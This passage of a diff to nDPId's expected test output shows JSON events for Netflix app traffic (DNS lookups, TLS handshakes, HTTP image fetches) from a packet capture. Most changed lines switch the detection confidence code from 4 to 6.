{"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":279,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035342,"flow_last_seen":1484319035449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319035449,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1484319035889,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":164,"pkt_l4_len":130,"thread_ts_msec":1484319035889,"pkt":"AQBef\/\/65JjWH70UCABFAACW0KMAAAERNwrAqAEH7\/\/\/+tIQB2wAggqVTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMg0KU1Q6IHVybjptZHgtbmV0ZmxpeC1jb206c2VydmljZTp0YXJnZXQ6MA0KDQo="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319036827,"flow_last_seen":1484319036827,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1484319036827,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1484319036827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1484319036827,"pkt":"gCqoTGHM5JjWH70UCABFAABHX6YAAP8R2KbAqAEHwKgBAeF3ADUAM2aFMVgBAAABAAAAAAAABHNoYTIDc2FuBGFrYW0HbmZseGltZwNuZXQAAAEAAQ=="} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319036827,"flow_last_seen":1484319036827,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1484319036827,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"sha2.san.akam.nflximg.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319036827,"flow_last_seen":1484319036827,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1484319036827,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"sha2.san.akam.nflximg.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1484319036847,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1484319036847,"pkt":"5JjWH70UgCqoTGHMCABFAAB74URAAEAR1dTAqAEBwKgBBwA14XcAZ3RRMViBgAABAAIAAAAABHNoYTIDc2FuBGFrYW0HbmZseGltZwNuZXQAAAEAAcAMAAUAAQAAACAAGAVlMzA2NwRkc2NnCmFrYW1haWVkZ2XAIsA3AAEAAQAAABIABGhWYbM="} -00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":324,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319036827,"flow_last_seen":1484319036847,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1484319036847,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"sha2.san.akam.nflximg.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.86.97.179"}} +00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":324,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319036827,"flow_last_seen":1484319036847,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1484319036847,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"sha2.san.akam.nflximg.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.86.97.179"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319036854,"flow_last_seen":1484319036854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319036854,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1484319036854,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319036854,"pkt":"gCqoTGHM5JjWH70UCABFAABAqeJAAEAGBR3AqAEHaFZhs8+VAbsXO1WDAAAAALAC\/\/+GqQAAAgQFtAEDAwUBAQgKH2THJwAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1484319036865,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319036865,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwGsuNoVmGzwKgBBwG7z5WR\/xaXFztVhKAScSAP4QAAAgQFtAQCCAoCM2vSH2THJwEDAwU="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1484319036868,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319036868,"pkt":"gCqoTGHM5JjWH70UCABFAAA0UCJAAEAGXunAqAEHaFZhs8+VAbsXO1WEkf8WmIAQEBWfqAAAAQEICh9kxzUCM2vS"} -00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319036854,"flow_last_seen":1484319036870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1484319036870,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319036854,"flow_last_seen":1484319036889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319036889,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"ef6b224ce027c8e21e5a25d8a58255a3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":333,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1484319036854,"flow_last_seen":1484319036900,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3641,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":1484319036900,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","server_names":"secure.cdn.nflximg.net,*.nflxext.com,*.nflxvideo.net,*.nflxsearch.net,*.nrd.nflximg.net,*.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"ef6b224ce027c8e21e5a25d8a58255a3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=Los Gatos, O=Netflix, Inc., OU=Content Delivery Operations, CN=secure.cdn.nflximg.net","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"0D:EF:D1:E6:29:11:1A:A5:88:B3:2F:04:65:D6:D7:AD:84:A2:52:26"}} +00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319036854,"flow_last_seen":1484319036870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1484319036870,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319036854,"flow_last_seen":1484319036889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319036889,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"ef6b224ce027c8e21e5a25d8a58255a3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":333,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1484319036854,"flow_last_seen":1484319036900,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3641,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":1484319036900,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","server_names":"secure.cdn.nflximg.net,*.nflxext.com,*.nflxvideo.net,*.nflxsearch.net,*.nrd.nflximg.net,*.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"ef6b224ce027c8e21e5a25d8a58255a3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=Los Gatos, O=Netflix, Inc., OU=Content Delivery Operations, CN=secure.cdn.nflximg.net","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"0D:EF:D1:E6:29:11:1A:A5:88:B3:2F:04:65:D6:D7:AD:84:A2:52:26"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319042988,"flow_last_seen":1484319042988,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1484319042988,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1484319042988,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1484319042988,"pkt":"gCqoTGHM5JjWH70UCABFAABGkh4AAP8Rpi\/AqAEHwKgBAecsADUAMtLh8roBAAABAAAAAAAAB2FydHdvcmsEYWthbQduZmx4aW1nA25ldAAAAQAB"} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319042988,"flow_last_seen":1484319042988,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1484319042988,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"artwork.akam.nflximg.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319042988,"flow_last_seen":1484319042988,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1484319042988,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"artwork.akam.nflximg.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1484319043002,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":148,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":148,"pkt_l4_len":114,"thread_ts_msec":1484319043002,"pkt":"5JjWH70UgCqoTGHMCABFAACG4UVAAEAR1cjAqAEBwKgBBwA15ywAct6B8rqBgAABAAMAAAAAB2FydHdvcmsEYWthbQduZmx4aW1nA25ldAAAAQABwAwABQABAAAAUwAUBWExOTA3BGRzY2cGYWthbWFpwCHANgABAAEAAAAHAAS4GcwZwDYAAQABAAAABwAEuBnMCg=="} -00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":609,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319042988,"flow_last_seen":1484319043002,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1484319043002,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"artwork.akam.nflximg.net","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.25"}} +00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":609,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319042988,"flow_last_seen":1484319043002,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1484319043002,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"artwork.akam.nflximg.net","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.25"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":610,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319043012,"flow_last_seen":1484319043012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319043012,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":610,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1484319043012,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319043012,"pkt":"gCqoTGHM5JjWH70UCABFAABA10xAAEAGHYnAqAEHuBnMGc+cAFC2IFmCAAAAALAC\/\/8TjwAAAgQFtAEDAwUBAQgKH2TelwAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319043013,"flow_last_seen":1484319043013,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319043013,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -120,68 +120,68 @@ 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1484319043035,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319043035,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lm4GcwZwKgBBwBQz53Qk2dE1OOFkqAScSD1lgAAAgQFtAQCCAr\/\/DsiH2TemAEDAwU="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1484319043041,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319043041,"pkt":"gCqoTGHM5JjWH70UCABFAAA0zhNAAEAGJs7AqAEHuBnMGc+cAFC2IFmDcAwqOIAQEBVtuwAAAQEICh9k3rb\/\/Dsd"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1484319043042,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319043042,"pkt":"gCqoTGHM5JjWH70UCABFAAA0UPZAAEAGo+vAqAEHuBnMGc+dAFDU44WS0JNnRYAQEBWFTgAAAQEICh9k3rb\/\/Dsi"} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043012,"flow_last_seen":1484319043068,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043068,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/af7a5\/362643424e775d0393ddb46e145c2375367af7a5.webp","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} -00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043013,"flow_last_seen":1484319043078,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043078,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/5758c\/bb636e44b87ef854c331ed7b7b6e157e4945758c.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} +00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043012,"flow_last_seen":1484319043068,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043068,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/af7a5\/362643424e775d0393ddb46e145c2375367af7a5.webp","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} +00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043013,"flow_last_seen":1484319043078,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043078,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 